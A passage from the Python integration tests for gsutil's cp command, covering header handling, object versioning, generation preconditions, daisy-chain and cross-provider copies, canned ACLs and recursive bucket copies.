self.RunGsUtil(['-h', 'content-Type:text/plain', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
self.assertNotRegex(stdout, r'image/gif')
_Check1()
self.RunGsUtil([
'-h', 'CONTENT-TYPE:image/gif', '-h', 'content-type:image/gif', 'cp',
fpath, dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertNotRegex(stdout, r'image/gif,\s*image/gif')
_Check2()
@SequentialAndParallelTransfer
def test_other_headers(self):
"""Tests that non-content-type headers are applied successfully on copy."""
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil([
'-h', 'Cache-Control:public,max-age=12', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta, 'cp', fpath, dst_uri
])
stdout = self.RunGsUtil(['ls', '-L', dst_uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
dst_uri2 = suri(bucket_uri, 'bar')
self.RunGsUtil(['cp', dst_uri, dst_uri2])
# Ensure metadata was preserved across copy.
stdout = self.RunGsUtil(['ls', '-L', dst_uri2], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
@SequentialAndParallelTransfer
def test_request_reason_header(self):
"""Test that x-goog-request-header can be set using the environment variable."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
# Ensure x-goog-request-header is set in cp command
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
# Ensure x-goog-request-header is set in ls command
stderr = self.RunGsUtil(['-D', 'ls', '-L', dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
@SequentialAndParallelTransfer
@SkipForXML('XML APIs use a different debug log format.')
def test_request_reason_header_persists_multiple_requests_json(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
# PUT follows GET request. Both need the request-reason header.
reason_regex = (r'Making http GET[\s\S]*'
r'x-goog-request-reason\': \'b/this_is_env_reason[\s\S]*'
r'send: (b\')?PUT[\s\S]*x-goog-request-reason:'
r' b/this_is_env_reason')
self.assertRegex(stderr, reason_regex)
@SequentialAndParallelTransfer
@SkipForJSON('JSON API uses a different debug log format.')
def test_request_reason_header_persists_multiple_requests_xml(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
reason_regex = (
r'Final headers: \{[\s\S]*\''
r'x-goog-request-reason\': \'b/this_is_env_reason\'[\s\S]*}')
# Pattern should match twice since two requests should have a reason header.
self.assertRegex(stderr, reason_regex + r'[\s\S]*' + reason_regex)
@SequentialAndParallelTransfer
def test_versioning(self):
"""Tests copy with versioning."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = urigen(k2_uri)
self.RunGsUtil(['cp', suri(k1_uri), suri(k2_uri)])
k2_uri = self.StorageUriCloneReplaceName(bucket_uri, k2_uri.object_name)
k2_uri = self.StorageUriCloneReplaceKey(bucket_uri, k2_uri.get_key())
g2 = urigen(k2_uri)
self.StorageUriSetContentsFromString(k2_uri, 'data3')
g3 = urigen(k2_uri)
fpath = self.CreateTempFile()
# Check to make sure current version is data3.
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Check contents of all three versions
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g1), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g2), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data2')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g3), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Copy first version to current and verify.
self.RunGsUtil(
['cp',
'%s#%s' % (k2_uri.versionless_uri, g1), k2_uri.versionless_uri])
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
# Attempt to specify a version-specific URI for destination.
stderr = self.RunGsUtil(['cp', fpath, k2_uri.uri],
return_stderr=True,
expected_status=1)
self.assertIn('cannot be the destination for gsutil cp', stderr)
def test_versioning_no_parallelism(self):
"""Tests that copy all-versions errors when parallelism is enabled."""
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil([
'-m', 'cp', '-A',
suri(self.nonexistent_bucket_name, 'foo'),
suri(self.nonexistent_bucket_name, 'bar')
],
expected_status=1,
return_stderr=True)
self.assertIn('-m option is not supported with the cp -A flag', stderr)
_Check()
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_recursive_copying_versioned_bucket(self):
"""Tests cp -R with versioned buckets."""
bucket1_uri = self.CreateVersionedBucket()
bucket2_uri = self.CreateVersionedBucket()
bucket3_uri = self.CreateVersionedBucket()
# Write two versions of an object to the bucket1.
v1_uri = self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'data0')
self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'longer_data1',
gs_idempotent_generation=urigen(v1_uri))
self.AssertNObjectsInBucket(bucket1_uri, 2, versioned=True)
self.AssertNObjectsInBucket(bucket2_uri, 0, versioned=True)
self.AssertNObjectsInBucket(bucket3_uri, 0, versioned=True)
# Recursively copy to second versioned bucket.
# -A flag should copy all versions in order.
self.RunGsUtil(
['cp', '-R', '-A',
suri(bucket1_uri, '*'),
suri(bucket2_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket2_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
self.assertEquals(len(listing2), 4)
# First object in each bucket should match in size and version-less name.
size1, _, uri_str1, _ = listing1[0].split()
self.assertEquals(size1, str(len('data0')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[0].split()
self.assertEquals(size2, str(len('data0')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
# Similarly for second object in each bucket.
size1, _, uri_str1, _ = listing1[1].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[1].split()
self.assertEquals(size2, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
_Check2()
# Recursively copy to second versioned bucket with no -A flag.
# This should copy only the live object.
self.RunGsUtil(['cp', '-R', suri(bucket1_uri, '*'), suri(bucket3_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket3_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
# 1 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing2), 3)
# Live (second) object in bucket 1 should match the single live object.
size1, _, uri_str1, _ = listing2[0].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
_Check3()
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_generation_zero_match(self):
"""Tests that cp handles an object-not-exists precondition header."""
bucket_uri = self.CreateBucket()
fpath1 = self.CreateTempFile(contents=b'data1')
# Match 0 means only write the object if it doesn't already exist.
gen_match_header = 'x-goog-if-generation-match:0'
# First copy should succeed.
# TODO: This can fail (rarely) if the server returns a 5xx but actually
# commits the bytes. If we add restarts on small uploads, handle this
# case.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(bucket_uri)])
# Second copy should fail with a precondition error.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_v_generation_match(self):
"""Tests that cp -v option handles the if-generation-match header."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = k1_uri.generation
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
gen_match_header = 'x-goog-if-generation-match:%s' % g1
# First copy should succeed.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(k1_uri)])
# Second copy should fail the precondition.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
# Specifiying a generation with -n should fail before the request hits the
# server.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', '-n', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn(
'Specifying x-goog-if-generation-match is not supported '
'with cp -n', stderr)
@SequentialAndParallelTransfer
def test_cp_nv(self):
"""Tests that cp -nv works when skipping existing file."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
# First copy should succeed.
self.RunGsUtil(['cp', '-nv', fpath1, suri(k1_uri)])
# Second copy should skip copying.
stderr = self.RunGsUtil(
['cp', '-nv', fpath1, suri(k1_uri)], return_stderr=True)
self.assertIn('Skipping existing item:', stderr)
@SequentialAndParallelTransfer
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_cp_v_option(self):
""""Tests that cp -v returns the created object's version-specific URI."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
# Case 1: Upload file to object using one-shot PUT.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 2: Upload file to object using resumable upload.
size_threshold = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(size_threshold))
with SetBotoConfigForTest([boto_config_for_test]):
file_as_string = os.urandom(size_threshold)
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=file_as_string)
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 3: Upload stream to object.
self._run_cp_minus_v_test('-v', '-', k2_uri.uri)
# Case 4: Download object to file. For this case we just expect output of
# gsutil cp -v to be the URI of the file.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir)
dst_uri = storage_uri(fpath1)
stderr = self.RunGsUtil(
['cp', '-v', suri(k1_uri), suri(dst_uri)], return_stderr=True)
# TODO: Add ordering assertion (should be in stderr.split('\n)[-2]) back
# once both the creation and status messages are handled by the UI thread.
self.assertIn('Created: %s\n' % dst_uri.uri, stderr)
# Case 5: Daisy-chain from object to object.
self._run_cp_minus_v_test('-Dv', k1_uri.uri, k2_uri.uri)
# Case 6: Copy object to object in-the-cloud.
self._run_cp_minus_v_test('-v', k1_uri.uri, k2_uri.uri)
def _run_cp_minus_v_test(self, opt, src_str, dst_str):
"""Runs cp -v with the options and validates the results."""
stderr = self.RunGsUtil(['cp', opt, src_str, dst_str], return_stderr=True)
match = re.search(r'Created: (.*)\n', stderr)
self.assertIsNotNone(match)
created_uri = match.group(1)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-a', dst_str], return_stdout=True)
lines = stdout.split('\n')
# Final (most recent) object should match the "Created:" URI. This is
# in second-to-last line (last line is '\n').
self.assertGreater(len(lines), 2)
self.assertEqual(created_uri, lines[-2])
_Check1()
@SequentialAndParallelTransfer
def test_stdin_args(self):
"""Tests cp with the -I option."""
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
fpath2 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '-I', suri(bucket_uri)],
stdin='\n'.join((fpath1, fpath2)))
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath1), stdout)
self.assertIn(os.path.basename(fpath2), stdout)
self.assertNumLines(stdout, 2)
_Check1()
def test_cross_storage_class_cloud_cp(self):
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Server now allows copy-in-the-cloud across storage classes.
self.RunGsUtil(['cp', suri(key_uri), suri(bucket2_uri)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_cross_provider_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket, contents=b'foo')
gs_key = self.CreateObject(bucket_uri=gs_bucket, contents=b'bar')
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
@unittest.skip('This test performs a large copy but remains here for '
'debugging purposes.')
def test_cross_provider_large_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket,
contents=b'f' * 1024 * 1024)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * 1024 * 1024)
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))]):
# Ensure copy also works across json upload chunk boundaries.
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_gs_to_s3_multipart_cp(self):
"""Ensure daisy_chain works for an object that is downloaded in 2 parts."""
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs', prefer_json_api=True)
num_bytes = int(_DEFAULT_DOWNLOAD_CHUNK_SIZE * 1.1)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * num_bytes,
prefer_json_api=True)
self.RunGsUtil([
'-o', 's3:use-sigv4=True', '-o', 's3:host=s3.amazonaws.com', 'cp',
suri(gs_key),
suri(s3_bucket)
])
@unittest.skip('This test is slow due to creating many objects, '
'but remains here for debugging purposes.')
def test_daisy_chain_cp_file_sizes(self):
"""Ensure daisy chain cp works with a wide of file sizes."""
bucket_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
exponent_cap = 28 # Up to 256 MiB in size.
for i in range(exponent_cap):
one_byte_smaller = 2**i - 1
normal = 2**i
one_byte_larger = 2**i + 1
self.CreateObject(bucket_uri=bucket_uri, contents=b'a' * one_byte_smaller)
self.CreateObject(bucket_uri=bucket_uri, contents=b'b' * normal)
self.CreateObject(bucket_uri=bucket_uri, contents=b'c' * one_byte_larger)
self.AssertNObjectsInBucket(bucket_uri, exponent_cap * 3)
self.RunGsUtil(
['-m', 'cp', '-D',
suri(bucket_uri, '**'),
suri(bucket2_uri)])
self.AssertNObjectsInBucket(bucket2_uri, exponent_cap * 3)
def test_daisy_chain_cp(self):
"""Tests cp with the -D option."""
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set some headers on source object so we can verify that headers are
# presereved by daisy-chain copy.
self.RunGsUtil([
'setmeta', '-h', 'Cache-Control:public,max-age=12', '-h',
'Content-Type:image/gif', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta,
suri(key_uri)
])
# Set public-read (non-default) ACL so we can verify that cp -D -p works.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
acl_json = self.RunGsUtil(['acl', 'get', suri(key_uri)], return_stdout=True)
# Perform daisy-chain copy and verify that source object headers and ACL
# were preserved. Also specify -n option to test that gsutil correctly
# removes the x-goog-if-generation-match:0 header that was set at uploading
# time when updating the ACL.
stderr = self.RunGsUtil(
['cp', '-Dpn', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertNotIn('Copy-in-the-cloud disallowed', stderr)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
stdout = self.RunGsUtil(['ls', '-L', uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control:\s+public,max-age=12')
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertRegex(stdout, r'Metadata:\s+1:\s+abcd')
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(acl_json, new_acl_json)
_Check()
@unittest.skipUnless(
not HAS_GS_PORT, 'gs_port is defined in config which can cause '
'problems when uploading and downloading to the same local host port')
def test_daisy_chain_cp_download_failure(self):
"""Tests cp with the -D option when the download thread dies."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri,
contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, '-D',
suri(key_uri),
suri(bucket2_uri)
],
expected_status=1,
return_stderr=True)
# Should have three exception traces; one from the download thread and
# two from the upload thread (expection message is repeated in main's
# _OutputAndExit).
self.assertEqual(
stderr.count(
'ResumableDownloadException: Artifically halting download'), 3)
def test_streaming_gzip_upload(self):
"""Tests error when compression flag is requested on a streaming source."""
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-Z', '-', suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1,
stdin='streaming data')
self.assertIn(
'gzip compression is not currently supported on streaming uploads',
stderr)
def test_seek_ahead_upload_cp(self):
"""Tests that the seek-ahead iterator estimates total upload work."""
tmpdir = self.CreateTempDir(test_files=3)
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_seek_ahead_download_cp(self):
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=3)
self.AssertNObjectsInBucket(bucket_uri, 3)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_canned_acl_cp(self):
"""Tests copying with a canned ACL."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
self.RunGsUtil(
['cp', '-a', 'public-read',
suri(key_uri),
suri(bucket2_uri)])
# Set public-read on the original key after the copy so we can compare
# the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
_Check()
@SequentialAndParallelTransfer
def test_canned_acl_upload(self):
"""Tests uploading a file with a canned ACL."""
bucket1_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set public-read on the object so we can compare the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
file_name = 'bar'
fpath = self.CreateTempFile(file_name=file_name, contents=b'foo')
self.RunGsUtil(['cp', '-a', 'public-read', fpath, suri(bucket1_uri)])
new_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, file_name)], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
resumable_size = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(resumable_size))
with SetBotoConfigForTest([boto_config_for_test]):
resumable_file_name = 'resumable_bar'
resumable_contents = os.urandom(resumable_size)
resumable_fpath = self.CreateTempFile(file_name=resumable_file_name,
contents=resumable_contents)
self.RunGsUtil(
['cp', '-a', 'public-read', resumable_fpath,
suri(bucket1_uri)])
new_resumable_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, resumable_file_name)],
return_stdout=True)
self.assertEqual(public_read_acl, new_resumable_acl_json)
def test_cp_key_to_local_stream(self):
bucket_uri = self.CreateBucket()
contents = b'foo'
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
stdout = self.RunGsUtil(['cp', suri(key_uri), '-'], return_stdout=True)
self.assertIn(contents, stdout.encode('ascii'))
def test_cp_local_file_to_local_stream(self):
contents = b'content'
fpath = self.CreateTempFile(contents=contents)
stdout = self.RunGsUtil(['cp', fpath, '-'], return_stdout=True)
self.assertIn(contents, stdout.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_zero_byte_file(self):
dst_bucket_uri = self.CreateBucket()
src_dir = self.CreateTempDir()
fpath = os.path.join(src_dir, 'zero_byte')
with open(fpath, 'w') as unused_out_file:
pass # Write a zero byte file
self.RunGsUtil(['cp', fpath, suri(dst_bucket_uri)])
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(dst_bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath), stdout)
_Check1()
download_path = os.path.join(src_dir, 'zero_byte_download')
self.RunGsUtil(['cp', suri(dst_bucket_uri, 'zero_byte'), download_path])
self.assertTrue(os.stat(download_path))
def test_copy_bucket_to_bucket(self):
"""Tests recursively copying from bucket to bucket.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateVersionedBucket()
dst_bucket_uri = self.CreateVersionedBucket()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
_CopyAndCheck()
@SkipForGS('Only s3 V4 signatures error on location mismatches.')
def test_copy_bucket_to_bucket_with_location_redirect(self):
# cp uses a sender function that raises an exception on location mismatches,
# instead of returning a response. This integration test ensures retries
# from exceptions work correctly.
src_bucket_region = 'ap-east-1'
dest_bucket_region = 'us-east-2'
src_bucket_host = 's3.%s.amazonaws.com' % src_bucket_region
dest_bucket_host = 's3.%s.amazonaws.com' % dest_bucket_region
client_host = 's3.eu-west-1.amazonaws.com'
with SetBotoConfigForTest([('s3', 'host', src_bucket_host)]):
src_bucket_uri = self.CreateBucket(location=src_bucket_region)
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
with SetBotoConfigForTest([('s3', 'host', dest_bucket_host)]):
dst_bucket_uri = self.CreateBucket(location=dest_bucket_region)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
with SetBotoConfigForTest([('s3', 'host', client_host)]):
_CopyAndCheck()
def test_copy_bucket_to_dir(self):
"""Tests recursively copying from bucket to a directory.
This should produce identically named objects (and not, in particular,
destination objects named by the version- specific URI from source objects).
"""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_copy_object_to_dir_s3_v4(self):
"""Tests copying object from s3 to local dir with v4 signature.
Regions like us-east2 accept only V4 signature, hence we will create
the bucket in us-east2 region to enforce testing with V4 signature.
"""
src_bucket_uri = self.CreateBucket(provider='s3', location='us-east-2')
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
